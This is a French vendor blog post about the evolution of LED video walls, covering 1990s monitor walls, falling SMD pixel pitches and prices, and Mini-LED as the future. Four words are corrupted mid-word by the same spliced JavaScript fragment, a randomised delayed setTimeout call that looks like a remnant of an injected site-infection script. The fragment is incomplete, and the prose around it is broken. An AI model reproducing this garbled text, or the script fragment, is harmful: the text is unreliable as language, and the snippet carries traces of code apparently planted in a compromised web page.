Mur LED, écran géant intérieur , mur d’images , mur vidéo … beaucoup de dénominations pour une grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande famille de produits.
Si il y a une gamme de produits qui a subi une évolution technologique ces dernières années c’est bien celle des murs LED.
Souvent nous faisons le parallèle avec l’informatique ou les smartphones , pour les murs LED c’est identique la technologie s’améliore et les coûts de productions chutent.
Le mur d’images la préhistoire du mur LED
Les années 90 , pas forcement si vieux mais à cette époque nous empilions des moniteurs pour former une grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande image.Les bords inter écran étaient de plusieurs mm et l’architecture système était une usine à gaz !!
Au fil des années les moniteurs sont devenus LCD puis backlight LED puis à bords fins , encore aujourd’hui nous pouvons voir certains mur d’images sur des plateaux TV ou dans des commerces.
Nous avons nous aussi proposé et vendu cette technologie de mur vidéo , il n’y avait à l’époque pas meilleur rapport qualité/prix.
Mur LED l’évolution des pitchs
Début des années 2010 et la démocratisation de la LED SMD , nous avons pu obtenir des composants permettant un Pitch de 10 et jusqu’à 4 mm.
Lorsque le mur vidéo LED était supérieur à 10 m2 ou de format atypique il est devenu envisageable d’opter pour un mur led.
En creusant dans nos archives , je suis retombé sur le dossier technique d’un projet de 2013.
C’est écran est toujours en service , toujours uniforme et propre mais à l’époque le Pitch de 6 mm était à plus de 15 000€/ m2 !! (sic)
En moins de 10 ans les prix des écrans géants led se sont considérablement érodés et le standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard de Pitch pour un mur led indoor est passé à moins de 3mm.
Techniquement la technologie LED SMD ne permet pas de réduire sereinement le pitch à moins de 2 mm , les points de soudures deviennent trop petits et les composants trop fragiles.
Nous pouvons donc dire que nous sommes arrivés au bout des possibilités de la technologie SMD.
Mini-LED l’avenir de la vidéo
Les spécialistes ne s’y trompent pas, l’avenir est à la Mini LED !!
La mini-LED est une nouvelle technologie d’affichage qui promet des rapports de contraste améliorés , des noirs plus profonds. Comme son nom l’indique, les mini-LED sont beaucoup plus petites que les LED ordinaires.
Les diodes inférieures à 0,2 mm sont généralement classées comme mini-LED.
Les écrans mini-LED ont des prix de production devenant plus abordable , nous pouvons des à présent proposer cette technologie.
Cette technologie Mini-LED apporte de nouveaux horizons au monde du mur LED professionnel mais révolutionnera aussi prochainement l’univers de la TV grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and public.